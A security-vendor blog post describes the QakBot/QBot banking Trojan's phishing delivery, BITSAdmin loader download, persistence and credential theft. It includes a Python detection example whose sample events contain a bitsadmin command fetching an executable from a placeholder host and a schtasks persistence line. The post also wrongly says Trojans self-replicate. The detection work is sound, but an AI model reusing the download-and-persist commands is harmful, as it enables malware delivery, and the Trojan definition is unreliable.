---
title: "How Is The Latest QakBot Variant QBot Infecting Electronic Devices? | Phish Protection"
description: "QBot -also referred to as QakBot- is a polymorphic Trojan that has been designed to steal financial information from the computer devices it infects."
image: "https://phishprotection.com/og/blog/how-is-the-latest-qakbot-variant-qbot-infecting-electronic-devices.png"
canonical: "https://phishprotection.com/blog/how-is-the-latest-qakbot-variant-qbot-infecting-electronic-devices/"
---


QBot, also referred to as QakBot, is a polymorphic _Trojan that has been designed to steal financial information from the computer devices it infects_. A Trojan is malware that has the capability to replicate itself, but QBot is exceptional in that it can undergo sophisticated modification to give attackers enhanced capabilities and can then spread through either networks or removable storage devices.

Research carried out by Varonis recently exposed a global [QBot Cyber Campaign](https://www.csoonline.com/article/3345972/qbot-malware-resurfaces-in-new-attack-against-businesses.html). It found that the C2 server had actively compromised thousands of victims around the globe. The primary targets of these attacks were US corporations, but the campaign has also hit networks around the world, with victims in Asia, South America, and Europe. The goal of these **cyber-attacks** was to steal financial information from victims, including bank account details. The report notes that the threat actors used a new variant of QBot.

![Phishing attack prevention](https://media.mailhop.org/phishprotection/images/2019/05/phishing-attack-prevention-7674.jpg) 

#### How The New Variant Of QBot Works:

A typical attack by this new variant of QBot stealthily exploits vulnerabilities in the targeted system. _The victim receives an email containing a link to OneDrive, which delivers a file with a .doc or .vbs extension when the victim clicks it, accidentally or intentionally._

QBot steals information, downloads harmful files, and opens a backdoor on the compromised machine. Although it has been around for years, this Trojan has recently resurfaced in a new version with [enhanced capabilities](https://threatpost.com/qbot-malware-morphs-quickly-to-evade-detection/117377/) and a new phishing-based method that can bypass anti-malware defenses such as antivirus software, **spam filters**, etc.

VBS files (Visual Basic script files) are source code and program files for Windows PCs. The malicious email appears to be part of an existing email thread. This is a **social engineering** tactic intended to lure victims into opening the file attached to the email. Once executed, the file extracts the victim's OS version and then downloads the QBot loader using Windows BITSAdmin (a tool that can create download or upload jobs and monitor their progress). Previous [variants of QBot](https://medium.com/@Alibaba%5FCloud/the-qakbot-family-extends-introducing-a-new-qbot-variant-700155a4af5) differed in that they used Windows PowerShell.

According to Varonis, the loader has multiple versions that keep getting updated even after execution. _It includes a “valid digital certificate”, which helps the file pass as trustworthy and induces fewer warnings in Windows._

Varonis found that each version of the loader is signed with a different digital certificate. Once installed, the malware creates scheduled tasks and adds entries to the Windows system registry. It launches a process into explorer.exe and then overwrites the original executable with a 32-bit version of calc.exe. QBot uses the following techniques to steal information:

- _Keylogging_
- _Hooking_
- _Stealing credentials, cookies, etc._

The goal of the malware is to steal sensitive and confidential information; once a user's account is compromised, cyber-criminals can draw money from it in later stages of the attack.
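As an added example (not from the original article or from Varonis), the Python below shows how a defender could flag the chain described above in process-creation logs: a script host launching a BITSAdmin download, the downloaded file running, and that file creating a scheduled task. The events, host names, paths, URL and rule names are constructed for illustration.

```python
# Added example: correlate script host -> BITSAdmin download -> scheduled task.
import shlex
from ntpath import basename  # parses Windows paths on any OS

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe", "winword.exe"}  # assumed parent set

# Constructed sample events (Sysmon Event ID 1 style); all values are placeholders.
EVENTS = [
    {"host": "WS01", "parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\wscript.exe",
     "cmd": r'wscript.exe "C:\Users\a\Downloads\invoice.vbs"'},
    {"host": "WS01", "parent": r"C:\Windows\System32\wscript.exe",
     "image": r"C:\Windows\System32\bitsadmin.exe",
     "cmd": r"bitsadmin /transfer job1 /download /priority high http://download.example.invalid/a.png C:\Users\a\AppData\Local\Temp\ldr.exe"},
    {"host": "WS01", "parent": r"C:\Windows\System32\wscript.exe",
     "image": r"C:\Users\a\AppData\Local\Temp\ldr.exe", "cmd": "ldr.exe"},
    {"host": "WS01", "parent": r"C:\Users\a\AppData\Local\Temp\ldr.exe",
     "image": r"C:\Windows\System32\schtasks.exe",
     "cmd": r"schtasks /create /tn upd /tr C:\Users\a\AppData\Local\Temp\ldr.exe /sc hourly"},
    # Benign control: a scheduled task created by a normal system process.
    {"host": "WS02", "parent": r"C:\Windows\System32\svchost.exe",
     "image": r"C:\Windows\System32\schtasks.exe",
     "cmd": r"schtasks /create /tn backup /tr C:\Tools\backup.cmd /sc daily"},
]

def detect(events):
    """Return (host, rule) alerts in event order."""
    alerts, fetched = [], {}  # fetched: host -> set of BITS-downloaded local paths
    for e in events:
        img = basename(e["image"]).lower()
        par = basename(e["parent"]).lower()
        # posix=False keeps backslashes intact; quotes are stripped afterwards.
        args = [a.strip('"') for a in shlex.split(e["cmd"], posix=False)]
        low = [a.lower() for a in args]
        dropped = fetched.setdefault(e["host"], set())
        if img == "bitsadmin.exe" and "/transfer" in low and par in SCRIPT_HOSTS:
            dropped.add(args[-1].lower())  # last /transfer argument is the local file
            alerts.append((e["host"], "script-host spawned BITS download"))
        elif e["image"].lower() in dropped:
            alerts.append((e["host"], "BITS-downloaded file executed"))
        elif img == "schtasks.exe" and "/create" in low and e["parent"].lower() in dropped:
            alerts.append((e["host"], "downloaded file created scheduled task"))
    return alerts
```

Correlating on the downloaded path, rather than alerting on every `schtasks /create`, keeps routine administrative tasks such as the WS02 event out of the results.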

#### A Brief History: The Presence of QBot & Impact

Let us now have a quick look at the history of QBot. QBot (also known as QakBot) is a banking Trojan that was first identified in 2009. _The QBot malware is known for its ability to evade detection_. It is challenging to spot the malware and even harder to eliminate it.

Cybercriminals have found its design convenient, like the ever-present AK-47 of the cyber world, and have continued to engineer and modify the malware, making it harder for security researchers & security services to detect it. The malware has previously targeted several governments and corporations around the world for stealing user information and banking credentials.

QBot has reappeared many times since 2009. For example, _it infected almost 500,000 PCs in 2014 to steal their financial data_. In 2016, a new variant of the malware infected more than 50,000 systems from different organizations around the world. It has also recently managed to infect cybersecurity vendors with its attacks.

![Protection from phishing](https://media.mailhop.org/phishprotection/images/2019/05/protection-from-phishing-7677.jpg) 

#### How To Keep Your PC Safe From QBot?

If you are worried about getting infected by the QBot malware, the tips below can help keep you and your devices safe. We recommend that users:

- Keep the operating system updated and avoid Windows versions that no longer receive support from Microsoft, such as Windows XP.
- Regularly update third-party software.
- Disable Java on the system if it is not used often.
- Never click on any URL in a suspicious email received in your inbox, or else use advanced threat defense from [phishprotection.com](/) for email protection.
- Do not download or open any suspected attachments from email or from anywhere on the web.

**References:**

- “Varonis Exposes Global Cyber Campaign”, [https://www.varonis.com/blog/varonis-discovers-global-cyber-campaign-qbot/](https://www.varonis.com/blog/varonis-discovers-global-cyber-campaign-qbot/)
- “QBot Malware resurfaces in new attack against businesses” (Lucian Constantin, Mar 1, 2019), [https://www.csoonline.com/article/3345972/qbot-malware-resurfaces-in-new-attack-against-businesses.amp.html](https://www.csoonline.com/article/3345972/qbot-malware-resurfaces-in-new-attack-against-businesses.amp.html)


[ Brad Slavin ](/authors/brad-slavin/) 

General Manager

Founder and General Manager of DuoCircle. Product strategy and commercial lead across DuoCircle's 2,000+ customer base.

